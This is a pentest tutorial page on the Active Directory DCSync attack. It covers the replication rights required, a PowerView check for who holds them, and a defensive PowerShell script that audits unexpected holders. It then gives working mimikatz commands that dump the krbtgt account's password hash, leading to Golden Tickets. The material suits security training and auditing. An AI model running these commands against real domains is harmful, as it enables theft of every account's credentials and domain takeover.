# DCSync

This attack simulates the behavior of a domain controller and asks other domain controllers to replicate information using the Directory Replication Service Remote Protocol ([MS-DRSR](https://msdn.microsoft.com/en-us/library/cc228086.aspx)). Basically, it lets you pretend to be a domain controller and ask for user password data.

This can be used by attackers to get any account’s NTLM hash, including the KRBTGT account, which enables attackers to create [Golden Tickets](https://xedex.gitbook.io/internalpentest/active-directory/post-compromise-attacks/golden-tickets).

The only prerequisite to worry about is that you have an account with rights to perform domain replication. This is controlled by the Replicating Changes permissions set on the domain object:

* The “[**DS-Replication-Get-Changes**](https://msdn.microsoft.com/en-us/library/ms684354\(v=vs.85\).aspx)” extended right
  * **CN:** DS-Replication-Get-Changes
  * **GUID:** 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
* The “[**Replicating Directory Changes All**](https://msdn.microsoft.com/en-us/library/ms684355\(v=vs.85\).aspx)” extended right
  * **CN:** DS-Replication-Get-Changes-All
  * **GUID:** 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
* The “[**Replicating Directory Changes In Filtered Set**](https://msdn.microsoft.com/en-us/library/hh338663\(v=vs.85\).aspx)” extended right (this one isn’t always needed but we can add it just in case :)
  * **CN:** DS-Replication-Get-Changes-In-Filtered-Set
  * **GUID:** 89e95b76-444d-4c62-991a-0facbeda640c

Now, using PowerView, you can check who holds these rights by running:

```
Get-ObjectAcl -DistinguishedName "dc=fcorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')}
```
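For the defensive counterpart of that check, here is an added example (not from the original page) that walks the domain head's ACL with the RSAT ActiveDirectory module and reports every principal granted the three extended rights listed above (or GenericAll, which implies them), flagging any holder outside an assumed default baseline. The baseline list and the function name are my assumptions; tune them to your environment (for example, a directory-sync service account may legitimately appear).

```powershell
# Audit who can perform DCSync: holders of the replication extended rights on the domain head.
# Assumes the RSAT ActiveDirectory module (Get-ADDomain and the AD: PSDrive) is available.
Import-Module ActiveDirectory

# Extended-right GUIDs from the page; the empty GUID means "all extended rights".
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
    '00000000-0000-0000-0000-000000000000' = 'All extended rights (empty GUID)'
}

# Assumed baseline of principals expected to hold these rights; anything else is a finding.
$ExpectedHolders = @(
    'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS',
    'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators',
    '*\Domain Controllers',
    '*\Domain Admins',
    '*\Enterprise Admins'
)

function Get-DcSyncRightHolders {
    param([string]$DomainDN = (Get-ADDomain).DistinguishedName)

    $acl = Get-Acl -Path "AD:\$DomainDN"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $rights = $ace.ActiveDirectoryRights.ToString()
        $guid   = $ace.ObjectType.ToString()

        # GenericAll grants every right; otherwise require an ExtendedRight ACE for a known GUID.
        $grants = if ($rights -match 'GenericAll') { 'GenericAll (implies replication rights)' }
                  elseif ($rights -match 'ExtendedRight' -and $ReplicationRights.ContainsKey($guid)) { $ReplicationRights[$guid] }
                  else { $null }
        if (-not $grants) { continue }

        $who = $ace.IdentityReference.Value
        [pscustomobject]@{
            Identity  = $who
            Grants    = $grants
            Inherited = $ace.IsInherited
            Expected  = @($ExpectedHolders | Where-Object { $who -like $_ }).Count -gt 0
        }
    }
}

# Report only unexpected holders: each of them can replicate password data from this domain.
Get-DcSyncRightHolders | Where-Object { -not $_.Expected } | Format-Table -AutoSize
```

Run it as a user who can read the domain object's security descriptor; an empty result means only baseline principals hold the rights, and any row is an account whose replication rights should be justified or removed.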

If you do have the necessary rights, the rest is quite simple. Simply execute the following command in mimikatz:

```
lsadump::dcsync /domain:[YOUR DOMAIN, ALTHOUGH NOT NECESSARY] /user:[ANY USER WHOSE PASSWORD DETAILS YOU WANT]
```

For example:

```
lsadump::dcsync /domain:fcorp.local /user:krbtgt
```

You can also do that via PowerView:

```
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
```

Congratz ;)

More details and explanation:

{% embed url="http://www.harmj0y.net/blog/redteaming/abusing-active-directory-permissions-with-powerview/" %}

{% embed url="https://blog.stealthbits.com/extracting-user-password-data-with-mimikatz-dcsync/" %}

{% embed url="https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync" %}
